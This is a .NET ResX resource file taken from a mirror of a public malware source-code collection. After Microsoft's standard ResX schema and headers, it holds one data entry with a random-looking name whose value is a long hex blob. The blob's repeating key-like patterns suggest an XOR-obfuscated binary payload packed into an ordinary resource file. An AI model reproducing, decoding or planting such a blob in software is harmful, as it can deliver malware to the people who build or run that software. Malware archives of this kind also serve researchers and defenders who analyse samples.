mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
123 lines
1.3 MiB
Plaintext
123 lines
1.3 MiB
Plaintext
|
<?xml version="1.0" encoding="utf-8"?>
|
||
|
<root>
|
||
|
<!--
|
||
|
Microsoft ResX Schema
|
||
|
|
||
|
Version 2.0
|
||
|
|
||
|
The primary goals of this format is to allow a simple XML format
|
||
|
that is mostly human readable. The generation and parsing of the
|
||
|
various data types are done through the TypeConverter classes
|
||
|
associated with the data types.
|
||
|
|
||
|
Example:
|
||
|
|
||
|
... ado.net/XML headers & schema ...
|
||
|
<resheader name="resmimetype">text/microsoft-resx</resheader>
|
||
|
<resheader name="version">2.0</resheader>
|
||
|
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
|
||
|
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
|
||
|
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
|
||
|
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
|
||
|
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
|
||
|
<value>[base64 mime encoded serialized .NET Framework object]</value>
|
||
|
</data>
|
||
|
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
|
||
|
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
|
||
|
<comment>This is a comment</comment>
|
||
|
</data>
|
||
|
|
||
|
There are any number of "resheader" rows that contain simple
|
||
|
name/value pairs.
|
||
|
|
||
|
Each data row contains a name, and value. The row also contains a
|
||
|
type or mimetype. Type corresponds to a .NET class that support
|
||
|
text/value conversion through the TypeConverter architecture.
|
||
|
Classes that don't support this are serialized and stored with the
|
||
|
mimetype set.
|
||
|
|
||
|
The mimetype is used for serialized objects, and tells the
|
||
|
ResXResourceReader how to depersist the object. This is currently not
|
||
|
extensible. For a given mimetype the value must be set accordingly:
|
||
|
|
||
|
Note - application/x-microsoft.net.object.binary.base64 is the format
|
||
|
that the ResXResourceWriter will generate, however the reader can
|
||
|
read any of the formats listed below.
|
||
|
|
||
|
mimetype: application/x-microsoft.net.object.binary.base64
|
||
|
value : The object must be serialized with
|
||
|
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
|
||
|
: and then encoded with base64 encoding.
|
||
|
|
||
|
mimetype: application/x-microsoft.net.object.soap.base64
|
||
|
value : The object must be serialized with
|
||
|
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
|
||
|
: and then encoded with base64 encoding.
|
||
|
|
||
|
mimetype: application/x-microsoft.net.object.bytearray.base64
|
||
|
value : The object must be serialized into a byte array
|
||
|
: using a System.ComponentModel.TypeConverter
|
||
|
: and then encoded with base64 encoding.
|
||
|
-->
|
||
|
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
|
||
|
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
|
||
|
<xsd:element name="root" msdata:IsDataSet="true">
|
||
|
<xsd:complexType>
|
||
|
<xsd:choice maxOccurs="unbounded">
|
||
|
<xsd:element name="metadata">
|
||
|
<xsd:complexType>
|
||
|
<xsd:sequence>
|
||
|
<xsd:element name="value" type="xsd:string" minOccurs="0" />
|
||
|
</xsd:sequence>
|
||
|
<xsd:attribute name="name" use="required" type="xsd:string" />
|
||
|
<xsd:attribute name="type" type="xsd:string" />
|
||
|
<xsd:attribute name="mimetype" type="xsd:string" />
|
||
|
<xsd:attribute ref="xml:space" />
|
||
|
</xsd:complexType>
|
||
|
</xsd:element>
|
||
|
<xsd:element name="assembly">
|
||
|
<xsd:complexType>
|
||
|
<xsd:attribute name="alias" type="xsd:string" />
|
||
|
<xsd:attribute name="name" type="xsd:string" />
|
||
|
</xsd:complexType>
|
||
|
</xsd:element>
|
||
|
<xsd:element name="data">
|
||
|
<xsd:complexType>
|
||
|
<xsd:sequence>
|
||
|
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
|
||
|
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
|
||
|
</xsd:sequence>
|
||
|
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
|
||
|
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
|
||
|
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
|
||
|
<xsd:attribute ref="xml:space" />
|
||
|
</xsd:complexType>
|
||
|
</xsd:element>
|
||
|
<xsd:element name="resheader">
|
||
|
<xsd:complexType>
|
||
|
<xsd:sequence>
|
||
|
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
|
||
|
</xsd:sequence>
|
||
|
<xsd:attribute name="name" type="xsd:string" use="required" />
|
||
|
</xsd:complexType>
|
||
|
</xsd:element>
|
||
|
</xsd:choice>
|
||
|
</xsd:complexType>
|
||
|
</xsd:element>
|
||
|
</xsd:schema>
|
||
|
<resheader name="resmimetype">
|
||
|
<value>text/microsoft-resx</value>
|
||
|
</resheader>
|
||
|
<resheader name="version">
|
||
|
<value>2.0</value>
|
||
|
</resheader>
|
||
|
<resheader name="reader">
|
||
|
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
|
||
|
</resheader>
|
||
|
<resheader name="writer">
|
||
|
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
|
||
|
</resheader>
|
||
|
<data name="jOCWNEScLKxkLhtIp" xml:space="preserve">
|
||
|
<value>0F3721524443774F49694A63969A7174F165666F7974586D065A696D6349525351564779476B7877426D71524643774F4D694563696571744965666F7975586DFC4A73637CFD5B9E70EE46358A4AE8E716051821663305202A1B240E490804073D45040A59062D03662F1D09063B72043838744B4A615C40426D71524643774F4D694563696571744965666F7974586D465A736D6349525351564779476B7877426D71524643774F4D694563696571744965666F7974586D465A736D6349525351564779476B7877426D71524643774F4D694563696571744965666F7974586D465A736D6349525351564779476B7877426D71524643774F4D694563696571741920666F3575516D28D514226349525351564779A76BF6F6496C734B46997F4F4D35446369657174C1BD6E6F7964586D46AA7B6D634912535146477947697877466D71524643774F496945636965717449756D6F7970586D0189796D6149525351565779472B7877426D61524653774F4D694563796571744965666F7974586D46EA7A6DBF09525351E64D793F3F7877426D71524643774F4D6945636965717449456C6FA5FC586D465A736D6349525351564779476B7877426D71524643774F4D794F63716571744965666F7974586D465A736D63495253C5EA4E799F627877426D71524643774F4D694563696571744965666F7974586D682E16151749525351E94F79477B787742AD79524647774F4D694563696571744965666F5974580D683307081B3D5253614F477947BB70774277715246877F4F4D694563696571744965666F5974580D683E121902495253A5614779479B707742557152469D7F4F4D694563696571744965666F397458AD6838001E6349525351224779475B7177426D715246557E4F4D694563696571744965666F797458AD6833170C172852538D16477947DB7177422F715246557E4F4D694563696571744965666F397458AD682E1F1E6349525369564779476B7277426D7152461B7E4F4D694563696571744965666F797458AD6828170C1728525349564779477B7277426F7152461B7E4F4D694563696571744965666F3974582D682816010C2A52538DDE4779474B727742E7715246197E4F4D694563696571744965666F3974582F6828001F004952532902477947DB7277423B715246A77E4F4D694563696571744965666F3974582D465A736D6349525351564779479B7277426D715246677D4F4D694563696571744965666F3974582D465A736D6349525351564779476B7877426D71524643774F4D694563696571744965666F7974586D465A736D6349525351564779476B7877426D71524643774F4D694563696571744965666F7974586D465A736D6349525351564779476B7877426D71524643774F4D694563696571744965666F7974586D424A336D604E103C3E3A2218296A7877426D70524643775F0D694025080902114D31141A1CF9186D6A4A336D614D113B30244679476B7888426D71C20653374F4C6E0C0D1D0016113B61666F79F4A792B925F8AD3B59125350520500330E7977426D71AD464377DF217905636861261B3B01656F79745892B95A73FDE3591253505E0418350F111923017452464377B0B296BAF3F17531744363151B0B1D360AE24A336D6843053A3533140D35021610F67D31524A493823283F241100041F004574266F7974586D465A736D6349525351564779476B7877426D71524643774F417805636D6571744965666FE13C186DE212336DCB011253FD1E0779E7233877AA2831524205374F0D2F05636E313E162300051B6165186D415D272201233730255A5639476B7877426D7154153A043B2804456351743174466F2F2617003D1F203B10086349525350564779476B787742AD71524643774F0B6F161A1A1114194A6599901165186D49533A290A3A223225352F4D562B7876426973524643774F8D694563696571324F361F1C0D11356946A58CFDAFCA167755AEAE60186B78F4064975AAAF74284F4DEA01476D9D9835166566A3B5E1492D46C5622D63E0431351574779476B7877426D71524683774F4D6945632FD06034496D666F7974586D46D7336D535B125390470779476B7877426D71524643774F4D694563696571744965666F4966186D4A5A736DA3591253C91E0779CB1B3877DA1D3152EA0B374FED210563C11531744D23266F3932186D570E3A03172C20353035221D080912122119FA92B96607F20469CEA396401DC90065EDAF865130D00F5AF8AD9C6C36EE1856CCB9B84E18CA0B6DFA92B9662BF20469CEA3964029C90065EDAF86510CD00F5AF8AD9C6C02EE1856CCB9B84E34CA0B6DFA92B9663FF20469CEA3964035C90065EDAF86519CD10F5AF8AD9C6C12EE1856CCB9B84E44CA0B6DFA92B9664FF20469CEA3964045C90065EDAF865198D10F5AF8AD9C6C62EE1856CCB9B84E54CA0B6DFA92B9665FF20469CEA3964055C90065EDAF865178D00F5AF8AD9C6C4EEE1856CCB9B84E60CA0B6DFA92B96663F20469CEA3964061C90065EDAF865154D00F5AF8AD9C6C5AEE1856CCB9B84E7CCA0B6DFA92B966CBF30469CEA3964071C90065EDAF8651A4D10F5AF8AD9C6CAAEF1856CCB9B84ED4CB0B6DFA92B966DFF30469CEA39640D5C80065EDAF8651ACD10F5AF8AD9C6CA2EF1856CCB9B84EE4CB0B6DFA92B966EFF30469CEA39640E5C80065EDAF8651B4D10F5AF8AD9C6CBAEF1856CCB9B84E9CCB0B6DFA92B96697F30469CEA39640ADC80065EDAF2AF79CD1FD50736D631DBA02AEA9B88F034F547636687EE51A6747C48EEA812732A6FAB4B640BED33074D3ADB97FA7D12A49D993AE7397C50E6BF3B7BD48
|
||
|
</data>
|
||
|
</root>
|